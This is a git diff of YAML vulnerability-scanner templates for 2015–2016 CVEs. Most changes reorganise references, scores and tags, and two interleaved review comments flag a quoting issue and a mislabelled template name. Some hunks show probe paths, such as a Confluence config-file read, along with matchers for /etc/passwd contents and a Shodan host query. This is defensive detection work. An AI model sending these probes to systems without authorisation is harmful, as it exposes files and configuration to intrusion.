b/cves/2015/CVE-2015-7780.yaml index 69704c0919..d18f8a1350 100644 --- a/cves/2015/CVE-2015-7780.yaml +++ b/cves/2015/CVE-2015-7780.yaml 
@@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/35933 - https://www.cvedetails.com/cve/CVE-2015-7780/ - tags: cve,cve2015,lfi,manageengine + - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html + - http://jvn.jp/en/jp/JVN21968837/index.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 + tags: cve,cve2015,lfi,manageengine requests: - method: GET diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml index 6cb8fcbda7..78174bdbb0 100644 --- a/cves/2015/CVE-2015-7823.yaml +++ b/cves/2015/CVE-2015-7823.yaml @@ -3,11 +3,14 @@ id: CVE-2015-7823 info: name: Kentico CMS 8.2 Open Redirection author: 0x_Akoko + severity: low description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability reference: - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 - severity: low + - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html + classification: + cve-id: CVE-2015-7823 tags: cve,cve2015,kentico,redirect requests: @@ -19,4 +22,4 @@ requests: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header \ No newline at end of file + part: header diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml index 266da313a8..df806df557 100644 --- a/cves/2015/CVE-2015-8349.yaml +++ b/cves/2015/CVE-2015-8349.yaml 
@@ -5,13 +5,16 @@ info: author: pikpikcu severity: medium description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349 - tags: cve,cve2015,xss,sourcebans + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-8349 + - https://www.htbridge.com/advisory/HTB23273 + - http://www.securityfocus.com/archive/1/537018/100/0/threaded classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2015-8349 cwe-id: CWE-79 + tags: cve,cve2015,xss,sourcebans requests: - method: GET diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml index 55ff02a7c7..907864b58b 100644 --- a/cves/2015/CVE-2015-8399.yaml +++ b/cves/2015/CVE-2015-8399.yaml 
@@ -1,21 +1,28 @@ id: CVE-2015-8399 + info: - author: princechaddha name: Atlassian Confluence configuration files read + author: princechaddha severity: medium description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. - reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - tags: cve,cve2015,atlassian,confluence + reference: + - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro + - https://www.exploit-db.com/exploits/39170/ + - http://www.securityfocus.com/archive/1/537232/100/0/threaded classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2015-8399 cwe-id: CWE-200 + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2015,atlassian,confluence requests: - method: GET path: - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName" + matchers-condition: and matchers: - type: status @@ -23,8 +30,8 @@ requests: - 200 - type: word + part: body words: - "confluence-init.properties" - "View Default Decorator" condition: and - part: body diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index 2651aa807d..6b29a0b822 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml 
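Review bot: The added `shodan-query: http.component:"Atlassian Confluence"` in the CVE-2015-8399 hunk is an unquoted plain scalar containing both a colon and double quotes; it parses today only because the colon is not followed by a space, and a later edit or a formatter inserting one would turn it into a nested mapping or a parse error. Quote the whole value, `shodan-query: 'http.component:"Atlassian Confluence"'`, so the query string is carried verbatim regardless of what follows the colon.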
@@ -8,12 +8,14 @@ info: reference: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 - tags: cve,cve2015,ssrf,oast + - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce + - http://www.openwall.com/lists/oss-security/2016/02/18/8 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N - cvss-score: 8.20 + cvss-score: 8.2 cve-id: CVE-2015-8813 cwe-id: CWE-918 + tags: cve,cve2015,ssrf,oast,umbraco requests: - method: GET @@ -22,6 +24,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" \ No newline at end of file + - "http" diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml index d65a7b2262..2a6a4b8d52 100644 --- a/cves/2015/CVE-2015-9414.yaml +++ b/cves/2015/CVE-2015-9414.yaml @@ -4,16 +4,18 @@ info: name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter. reference: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 - tags: cve,cve2015,wordpress,wp-plugin,xss + - https://wpvulndb.com/vulnerabilities/8175 + - https://wordpress.org/plugins/wp-symposium/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2015-9414 cwe-id: CWE-79 - description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter." + tags: cve,cve2015,wordpress,wp-plugin,xss requests: - method: GET 
diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml index aff9aca94d..ac300031f7 100644 --- a/cves/2015/CVE-2015-9480.yaml +++ b/cves/2015/CVE-2015-9480.yaml @@ -1,19 +1,19 @@ id: CVE-2015-9480 info: - name: WordPress Plugin RobotCPA 5 - Directory Traversal + name: WordPress RobotCPA 5 - Directory Traversal author: daffainfo severity: high + description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://www.exploit-db.com/exploits/37252 - tags: cve,cve2015,wordpress,wp-plugin,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." + tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET @@ -24,8 +24,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml index 55a0fb1e4e..d2fb10609d 100644 --- a/cves/2016/CVE-2016-0957.yaml +++ b/cves/2016/CVE-2016-0957.yaml 
@@ -3,14 +3,16 @@ id: CVE-2016-0957 info: name: Adobe AEM Console Disclosure author: geeknik - description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. - reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html severity: high - tags: cve,cve2016,adobe,aem + description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. + reference: + - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html + - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2016-0957 + tags: cve,cve2016,adobe,aem requests: - method: GET diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml index 7570661517..e2b9a6d7ed 100644 --- a/cves/2016/CVE-2016-1000126.yaml +++ b/cves/2016/CVE-2016-1000126.yaml 
@@ -4,14 +4,18 @@ info: name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin admin-font-editor v1.8 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 + - https://wordpress.org/plugins/admin-font-editor + - http://www.securityfocus.com/bid/93896 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000126 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml index 51c400aa1e..4259ca9297 100644 --- a/cves/2016/CVE-2016-1000127.yaml +++ b/cves/2016/CVE-2016-1000127.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin ajax-random-post v2.00 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=494 + - https://wordpress.org/plugins/ajax-random-post + - http://www.securityfocus.com/bid/93895 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000127 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index 9e8645e466..b824ab00f2 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml 
@@ -8,12 +8,12 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism - tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000128 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index fbeb35821b..159bd01e94 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 + - https://wordpress.org/plugins/defa-online-image-protector + - http://www.vapidlabs.com/wp/wp_advisory.php?v=449 + - http://www.securityfocus.com/bid/93892 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000129 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index 04c6324c51..00972d2713 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml 
@@ -5,13 +5,16 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin e-search v1.0 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 + - https://wordpress.org/plugins/e-search + - http://www.vapidlabs.com/wp/wp_advisory.php?v=394 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000130 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml index f9e0d4a700..14269d707f 100644 --- a/cves/2016/CVE-2016-1000131.yaml +++ b/cves/2016/CVE-2016-1000131.yaml @@ -4,14 +4,18 @@ info: name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin e-search v1.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 + - https://wordpress.org/plugins/e-search + - http://www.securityfocus.com/bid/93867 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000131 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin e-search v1.0" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index c33a51fe7a..f8b05ac8dc 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml 
@@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 + - https://wordpress.org/plugins/enhanced-tooltipglossary + - http://www.securityfocus.com/bid/93865 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000132 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 64968b022f..154c2e4ebc 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + - https://wordpress.org/plugins/forget-about-shortcode-buttons + - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 + - http://www.securityfocus.com/bid/93869 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000133 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index d11a917306..41b08f9096 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml 
@@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin hdw-tube v1.2 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 + - https://wordpress.org/plugins/hdw-tube + - http://www.securityfocus.com/bid/93868 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000134 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index 5fbb768196..002bf598be 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin hdw-tube v1.2 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=533 + - https://wordpress.org/plugins/hdw-tube + - http://www.securityfocus.com/bid/93820 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000135 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml index 3adf484b9b..f6b6733834 100644 --- a/cves/2016/CVE-2016-1000136.yaml +++ b/cves/2016/CVE-2016-1000136.yaml 
@@ -8,12 +8,13 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 - tags: cve,cve2016,wordpress,xss,wp-plugin + - https://wordpress.org/plugins/heat-trackr classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000136 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml index eb4ae2195c..559d5ca9f7 100644 --- a/cves/2016/CVE-2016-1000137.yaml +++ b/cves/2016/CVE-2016-1000137.yaml @@ -4,14 +4,17 @@ info: name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin hero-maps-pro v2.1.0 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=658 + - https://wordpress.org/plugins/hero-maps-pro + - http://www.securityfocus.com/bid/93815 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000137 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0" + tags: cve,cve2016,wordpress,xss,wp-plugin,maps requests: - method: GET diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml index ee73a4ce9f..302b61fa02 100644 --- a/cves/2016/CVE-2016-1000138.yaml +++ b/cves/2016/CVE-2016-1000138.yaml 
@@ -4,14 +4,17 @@ info: name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin indexisto v1.0.5 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=38 + - https://wordpress.org/plugins/indexisto + - http://www.securityfocus.com/bid/93816 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000138 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin indexisto v1.0.5" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml index b3ff2bbb88..c07e1ac6b3 100644 --- a/cves/2016/CVE-2016-1000139.yaml +++ b/cves/2016/CVE-2016-1000139.yaml @@ -4,16 +4,18 @@ info: name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin infusionsoft v1.5.11 reference: - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 - tags: cve,cve2016,wordpress,wp-plugin,xss + - https://wordpress.org/plugins/infusionsoft + - http://www.vapidlabs.com/wp/wp_advisory.php?v=864 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000139 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" + tags: cve,cve2016,wordpress,wp-plugin,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml index 32a78c7534..0d02c2cf14 100644 --- a/cves/2016/CVE-2016-1000140.yaml +++ b/cves/2016/CVE-2016-1000140.yaml 
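Review bot: In the CVE-2016-1000138 hunk the added description reads `Reflected XSS in wordpress plugin indexisto v1.0.5` and the references point to `https://wordpress.org/plugins/indexisto`, but the unchanged `name:` line two lines above still says `Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)`, which is the title of the CVE-2016-1000126 template earlier in this diff. That looks like a copy-paste carry-over; the name should identify the affected plugin, e.g. `name: Indexisto <= 1.0.5 - Reflected Cross-Site Scripting (XSS)`, so findings are not attributed to the wrong plugin. The `name:` line is context here, but since the commit already rewrites this info block it is the natural place to correct it.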
@@ -4,14 +4,18 @@ info: name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin new-year-firework v1.1.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=453 + - https://wordpress.org/plugins/new-year-firework + - http://www.securityfocus.com/bid/93817 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000140 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml index 6450289e6c..6b37cdd77b 100644 --- a/cves/2016/CVE-2016-1000141.yaml +++ b/cves/2016/CVE-2016-1000141.yaml @@ -1,17 +1,21 @@ id: CVE-2016-1000141 info: - name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS) + name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=358 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 + - https://wordpress.org/plugins/page-layout-builder + remediation: Upgrade to version 2.0 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000141 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET 
@@ -33,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/cves/2016/CVE-2016-1000142.yaml b/cves/2016/CVE-2016-1000142.yaml index 2d1df9a78d..adfc312475 100644 --- a/cves/2016/CVE-2016-1000142.yaml +++ b/cves/2016/CVE-2016-1000142.yaml @@ -8,12 +8,14 @@ info: reference: - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 - tags: cve,cve2016,wordpress,wp-plugin,xss + - http://www.vapidlabs.com/wp/wp_advisory.php?v=435 + - https://wordpress.org/plugins/parsi-font classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000142 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,wp-plugin,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml index 65b05e634d..37b57b29af 100644 --- a/cves/2016/CVE-2016-1000143.yaml +++ b/cves/2016/CVE-2016-1000143.yaml @@ -8,12 +8,13 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 - tags: cve,cve2016,wordpress,wp-plugin,xss + - https://wordpress.org/plugins/photoxhibit classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000143 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,wp-plugin,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml index 4d9e921b14..e5f3bb2231 100644 --- a/cves/2016/CVE-2016-1000146.yaml +++ b/cves/2016/CVE-2016-1000146.yaml 
@@ -4,14 +4,18 @@ info: name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin pondol-formmail v1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 + - https://wordpress.org/plugins/pondol-formmail + - http://www.securityfocus.com/bid/93584 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000146 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin pondol-formmail v1.1" + tags: cve,cve2016,wordpress,xss,wp-plugin,mail requests: - method: GET diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml index 7340d0b0c2..a397d31ae5 100644 --- a/cves/2016/CVE-2016-1000148.yaml +++ b/cves/2016/CVE-2016-1000148.yaml @@ -4,16 +4,18 @@ info: name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin s3-video v0.983 reference: - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 - tags: cve,cve2016,wordpress,wp-plugin,xss + - https://wordpress.org/plugins/s3-video + - http://www.vapidlabs.com/wp/wp_advisory.php?v=240 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000148 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin s3-video v0.983" + tags: cve,cve2016,wordpress,wp-plugin,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml index 7998ec03d5..f55daff95d 